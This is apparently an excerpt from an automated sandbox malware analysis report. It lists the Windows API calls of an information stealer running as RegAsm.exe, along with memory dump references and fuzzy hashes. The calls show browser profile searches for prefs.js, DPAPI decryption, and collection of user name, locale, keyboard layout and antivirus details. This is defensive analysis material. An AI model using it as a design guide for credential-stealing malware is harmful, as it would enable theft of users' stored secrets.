                                                                                    • StrCmpCA.SHLWAPI(?,0042237C), ref: 004013E4
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00422388,?,?,?,00422384,?,?,?,00422380,?,?), ref: 00401510
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                    • FindNextFileA.KERNEL32(00000000,?,?,?,?,?,?,0042238C), ref: 00401832
                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,0042238C), ref: 00401841
                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 00401BD4
                                                                                    • FindClose.KERNEL32(?), ref: 00401BE5
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                      • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                      • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6
                                                                                      • Part of subcall function 0040618B: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                      • Part of subcall function 00414437: Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004144C0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileH_prolog$Find$lstrcpy$Close$CreateFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                    • String ID: 7$\*.*
                                                                                    • API String ID: 40499504-4165053604
                                                                                    • Opcode ID: 2415c5a552409a1327100fa76e5c65bacbb48c19f6e4dd66bfc40bef1be4ee54
                                                                                    • Instruction ID: 8097af2253b6e43ffd1ff437b79a581fef85e219c3474a36129b1183f2ad689d
                                                                                    • Opcode Fuzzy Hash: 2415c5a552409a1327100fa76e5c65bacbb48c19f6e4dd66bfc40bef1be4ee54
                                                                                    • Instruction Fuzzy Hash: 04624D70904188EADB15EBE5C955BDDBBB8AF29308F5040BEA509735C2DF781B4CCB25
                                                                                    Function 0040B463 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 311fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040B468
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425F68,?,?,00425C47,?,00000000,?), ref: 0040B4E7
                                                                                    • StrCmpCA.SHLWAPI(?,00425F6C,?,00000000,?), ref: 0040B50B
                                                                                    • StrCmpCA.SHLWAPI(?,00425F70,?,00000000,?), ref: 0040B525
                                                                                    • StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00425F74,?,?,00425C4A,?,00000000,?), ref: 0040B5C1
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425F84,?,?,00000000,00425C4B,?,00000000,?), ref: 0040B6C6
                                                                                    • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040B79B
                                                                                    • FindNextFileA.KERNELBASE(?,?,?,00000000,?), ref: 0040B84A
                                                                                    • FindClose.KERNEL32(?,?,00000000,?), ref: 0040B85B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileH_prologlstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                    • String ID: prefs.js
                                                                                    • API String ID: 2318033617-3783873740
                                                                                    • Opcode ID: 5666919e8824e042d0b5f70852cf441639314b1659d2301ad99abcf42152bb5b
                                                                                    • Instruction ID: be7758ef0e9bd93280a5f92db672ae0ad47210b716bb060d05ded798a66e6481
                                                                                    • Opcode Fuzzy Hash: 5666919e8824e042d0b5f70852cf441639314b1659d2301ad99abcf42152bb5b
                                                                                    • Instruction Fuzzy Hash: C9D18471900248EADB14EBE5C956BDDBBB4AF19304F5040BEE409B36C2DB781B4CCB66
                                                                                    Function 004094E5 Relevance: 15.3, APIs: 10, Instructions: 301fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004094EA
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425E1C,?,?,00425BFA,?), ref: 00409567
                                                                                    • StrCmpCA.SHLWAPI(?,00425E20), ref: 00409584
                                                                                    • StrCmpCA.SHLWAPI(?,00425E24), ref: 0040959E
                                                                                    • StrCmpCA.SHLWAPI(?,00000000,?,?,?,00425E28,?,?,00425BFB), ref: 00409635
                                                                                    • StrCmpCA.SHLWAPI(?), ref: 004096B6
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00408759: _EH_prolog.MSVCRT ref: 0040875E
                                                                                      • Part of subcall function 00408759: CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00425DC8,?,?,?,00425BEA,00000000), ref: 00408841
                                                                                    • FindNextFileA.KERNELBASE(00000000,?), ref: 0040989F
                                                                                    • FindClose.KERNEL32(00000000), ref: 004098AE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 322284088-0
                                                                                    • Opcode ID: e559499c3d2ef85a473f19cc83e64b7af054a451df30679cf9fec3c86fffa07d
                                                                                    • Instruction ID: f469bbe6791ff6929fd52be51ed7484ae91504fa3db0a5c2044313ffea23fdba
                                                                                    • Opcode Fuzzy Hash: e559499c3d2ef85a473f19cc83e64b7af054a451df30679cf9fec3c86fffa07d
                                                                                    • Instruction Fuzzy Hash: 73C17270900249EADF10EBA5D9167DDBFB8AB09304F10417EE844B36C2DB785B08CBA6
                                                                                    Function 0040FCE5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 96memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040FCEA
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000,004262AF,00000001,?,00000000), ref: 0040FD1C
                                                                                    • LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040FD2A
                                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040FD35
                                                                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040FD5F
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • LocalFree.KERNEL32(?), ref: 0040FE03
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$H_prologKeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                    • String ID: /
                                                                                    • API String ID: 2868853201-4001269591
                                                                                    • Opcode ID: 8e81c3fcb6512392ecb3f0709d7808244dc03f0de8ce522feb2af1cedb86ee9d
                                                                                    • Instruction ID: 670fa807c41248f436aa2cd72aaefdfaece762a4e3a61ecb974f96717b874319
                                                                                    • Opcode Fuzzy Hash: 8e81c3fcb6512392ecb3f0709d7808244dc03f0de8ce522feb2af1cedb86ee9d
                                                                                    • Instruction Fuzzy Hash: D231EDB1901119EFDB10EFE5D885AEEBBB9EF48304F54407EE509B3681C7785A88CB64
                                                                                    Function 004106C4 Relevance: 9.1, APIs: 6, Instructions: 67commemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004106C9
                                                                                    • CoCreateInstance.OLE32(00426D5C,00000000,00000001,00426488,?,00000001,00000000,00000000,00000001,?,00000000), ref: 004106F0
                                                                                    • SysAllocString.OLEAUT32(?), ref: 004106FD
                                                                                    • _wtoi64.MSVCRT ref: 00410738
                                                                                    • SysFreeString.OLEAUT32(?), ref: 0041074B
                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00410752
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: String$Free$AllocCreateH_prologInstance_wtoi64
                                                                                    • String ID:
                                                                                    • API String ID: 1816492551-0
                                                                                    • Opcode ID: 5a519e56b5a3f35fac8b8731372418453ffdd9c68a54ed5590e156cd5d61d494
                                                                                    • Instruction ID: 38727b362cf05651e2ba0c167973076b7eb5e8e7f8c877263c03ca4ede2a4bf2
                                                                                    • Opcode Fuzzy Hash: 5a519e56b5a3f35fac8b8731372418453ffdd9c68a54ed5590e156cd5d61d494
                                                                                    • Instruction Fuzzy Hash: A921A571A00109AFCB00DFA4DD889EE7BB5FF88304B60846EF515E7250C7B59D85CB64
                                                                                    Function 004111BE Relevance: 9.0, APIs: 6, Instructions: 45processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004111C3
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004111E9
                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 004111F9
                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 0041120B
                                                                                    • StrCmpCA.SHLWAPI(?,?,?,?,00000000), ref: 0041121F
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00411232
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
                                                                                    • String ID:
                                                                                    • API String ID: 186290926-0
                                                                                    • Opcode ID: a9f169bdbb2cdc4e9d02c35b7c1d11867838652ed038367759a7d765107c7668
                                                                                    • Instruction ID: 368edb313bfa2f31f76f5ba6fbd020b911e3fe3703e22c74ac1c99050383bae8
                                                                                    • Opcode Fuzzy Hash: a9f169bdbb2cdc4e9d02c35b7c1d11867838652ed038367759a7d765107c7668
                                                                                    • Instruction Fuzzy Hash: 56015A71900028AFDB119F95DD48ADEBBB9EF86300F204096F505F2220D7788F84CFA5
                                                                                    Function 0040FC92 Relevance: 6.0, APIs: 4, Instructions: 29memorytimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ), ref: 0040FCA3
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCAA
                                                                                    • GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCB9
                                                                                    • wsprintfA.USER32 ref: 0040FCD7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 362916592-0
                                                                                    • Opcode ID: 0604e6eb6e2682e20b2124677ba798e9b04fc5edbfebe48aceeb8ffeb4b62a16
                                                                                    • Instruction ID: c4178db3a7b5cadc3d34117ce99b3585a5539fb9734740f51f0b0a417066b3ea
                                                                                    • Opcode Fuzzy Hash: 0604e6eb6e2682e20b2124677ba798e9b04fc5edbfebe48aceeb8ffeb4b62a16
                                                                                    • Instruction Fuzzy Hash: 00E09275700234BBEB1067A8AC0EF87366EAB06725F111262FA15D21D0E6B499048AE5
                                                                                    Function 004062A5 Relevance: 4.5, APIs: 3, Instructions: 46memoryencryptionCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004062C8
                                                                                    • LocalAlloc.KERNEL32(00000040,?,?), ref: 004062E0
                                                                                    • LocalFree.KERNEL32(?), ref: 004062FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                    • String ID:
                                                                                    • API String ID: 2068576380-0
                                                                                    • Opcode ID: a1298b6901399f3ed61b1a780a28c5a3d32356ff32a82b06ef3c757afecfb89f
                                                                                    • Instruction ID: e950b9794f619c2f14945d92c2c82b9cfbc0e84929ee7baf067997c9d55b3a17
                                                                                    • Opcode Fuzzy Hash: a1298b6901399f3ed61b1a780a28c5a3d32356ff32a82b06ef3c757afecfb89f
                                                                                    • Instruction Fuzzy Hash: 38011D7A900218AFDB01EFE8DC849DEBBBDFF48700B10046AFA42E7250D6759950CB50
                                                                                    Function 0040FBCB Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,004265C7), ref: 0040FBD7
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00417274,004265C7), ref: 0040FBDE
                                                                                    • GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
